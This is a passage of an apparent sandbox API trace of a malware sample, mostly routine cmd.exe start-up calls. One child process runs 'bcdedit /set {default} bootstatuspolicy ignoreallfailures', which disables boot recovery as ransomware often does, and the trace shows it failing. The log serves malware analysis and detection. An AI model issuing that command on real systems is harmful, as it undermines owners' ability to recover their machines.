"c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.902] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.902] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.902] GetProcessHeap () returned 0x370000 [0076.902] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384be8 | out: hHeap=0x370000) returned 1 [0076.902] GetEnvironmentStringsW () returned 0x3840f8* [0076.902] GetProcessHeap () returned 0x370000 [0076.902] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb36) returned 0x385f38 [0076.902] FreeEnvironmentStringsW (penv=0x3840f8) returned 1 [0076.902] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.902] GetProcessHeap () returned 0x370000 [0076.902] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3856d8 | out: hHeap=0x370000) returned 1 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400e) returned 0x386a78 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x60) returned 0x382dc8 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386a78 | out: hHeap=0x370000) returned 1 [0076.903] GetConsoleOutputCP () returned 0x1b5 [0076.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.903] GetUserDefaultLCID () returned 0x409 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f978, cchData=128 | out: lpLCData="0") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f978, cchData=128 | out: lpLCData="0") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f978, cchData=128 | out: lpLCData="1") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.905] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.906] GetProcessHeap () returned 0x370000 [0076.906] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20c) returned 0x382e30 [0076.906] GetConsoleTitleW (in: lpConsoleTitle=0x382e30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.906] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400a) returned 0x386a78 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386a78 | out: hHeap=0x370000) returned 1 [0076.907] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0076.907] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0076.907] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0076.907] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0076.907] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0076.907] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0076.907] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383048 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x3830a8 [0076.908] GetProcessHeap () returned 0x370000 [0076.908] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4e) returned 0x3830c8 [0076.909] GetConsoleTitleW (in: lpConsoleTitle=0x14f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.107] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.107] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.109] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.109] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.109] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.110] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.110] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.110] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.110] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.110] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.110] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.110] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.110] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.110] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.110] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.110] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.110] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.110] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0077.110] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0077.110] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0077.110] GetProcessHeap () returned 0x370000 [0077.110] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x210) returned 0x383120 [0077.110] GetProcessHeap () returned 0x370000 [0077.110] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x5e) returned 0x383338 [0077.110] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x418) returned 0x3707f0 [0077.111] SetErrorMode (uMode=0x0) returned 0x0 [0077.111] SetErrorMode (uMode=0x1) returned 0x0 [0077.111] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3707f8, lpFilePart=0x14f190 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f190*="Desktop") returned 0x25 [0077.111] SetErrorMode (uMode=0x0) returned 0x1 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3707f0, Size=0x64) returned 0x3707f0 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3707f0) returned 0x64 [0077.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x120) returned 0x3833a0 [0077.111] GetProcessHeap () returned 0x370000 [0077.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x238) returned 0x370860 [0077.118] GetProcessHeap () returned 0x370000 [0077.118] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x370860, Size=0x122) returned 0x370860 [0077.118] GetProcessHeap () returned 0x370000 [0077.118] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x370860) returned 0x122 [0077.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.118] GetProcessHeap () returned 0x370000 [0077.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe0) returned 0x3834c8 [0077.119] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3834c8, Size=0x76) returned 0x3834c8 [0077.119] GetProcessHeap () returned 0x370000 [0077.119] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3834c8) returned 0x76 [0077.119] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.119] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.119] GetLastError () returned 0x2 [0077.119] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.120] GetLastError () returned 0x2 [0077.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.385] GetLastError () returned 0x2 [0077.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.386] GetLastError () returned 0x2 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.386] GetLastError () returned 0x2 [0077.386] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.480] GetLastError () returned 0x2 [0077.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14ef0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef0c) returned 0xffffffff [0077.480] GetLastError () returned 0x2 [0077.480] _get_osfhandle (_FileHandle=2) returned 0xb [0077.480] GetFileType (hFile=0xb) returned 0x2 [0077.481] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.481] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f360 | out: lpMode=0x14f360) returned 1 [0077.481] _get_osfhandle (_FileHandle=2) returned 0xb [0077.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14f394 | out: lpConsoleScreenBufferInfo=0x14f394) returned 1 [0077.481] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.482] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x14f3d4 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.482] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x14f3b8, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x14f3b8*=0x62) returned 1 [0077.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.483] SetConsoleInputExeNameW () returned 0x1 [0077.483] GetConsoleOutputCP () returned 0x1b5 [0077.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.483] exit (_Code=1) Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4531e000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0xb7c [0076.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fb1c | out: lpSystemTimeAsFileTime=0x33fb1c*(dwLowDateTime=0xf2a9c880, dwHighDateTime=0x1d61645)) [0076.987] GetCurrentProcessId () returned 0xb98 [0076.987] GetCurrentThreadId () returned 0xb7c [0076.988] GetTickCount () returned 0x11497cd [0076.988] QueryPerformanceCounter (in: lpPerformanceCount=0x33fb14 | out: lpPerformanceCount=0x33fb14*=19734228435) returned 1 [0076.989] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.989] __set_app_type (_Type=0x1) [0076.989] __p__fmode () returned 0x770331f4 [0076.989] __p__commode () returned 0x770331fc [0076.989] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.989] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.990] GetCurrentThreadId () returned 0xb7c [0076.990] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb7c) returned 0x60 [0076.990] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.990] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.990] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.123] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.123] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33faac | out: phkResult=0x33faac*=0x0) returned 0x2 [0077.123] VirtualQuery (in: lpAddress=0x33fae3, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x33f000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.123] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33fa7c, dwLength=0x1c | out: lpBuffer=0x33fa7c*(BaseAddress=0x340000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x160000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0077.123] GetConsoleOutputCP () returned 0x1b5 [0077.123] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.124] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.124] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.124] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.125] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0077.125] GetEnvironmentStringsW () returned 0x6920a0* [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x692b78 [0077.125] FreeEnvironmentStringsW (penv=0x6920a0) returned 1 [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x690cd8 [0077.125] GetEnvironmentStringsW () returned 0x6920a0* [0077.125] GetProcessHeap () returned 0x680000 [0077.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xaca) returned 0x693650 [0077.126] FreeEnvironmentStringsW (penv=0x6920a0) returned 1 [0077.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ea1c | out: phkResult=0x33ea1c*=0x68) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x40, 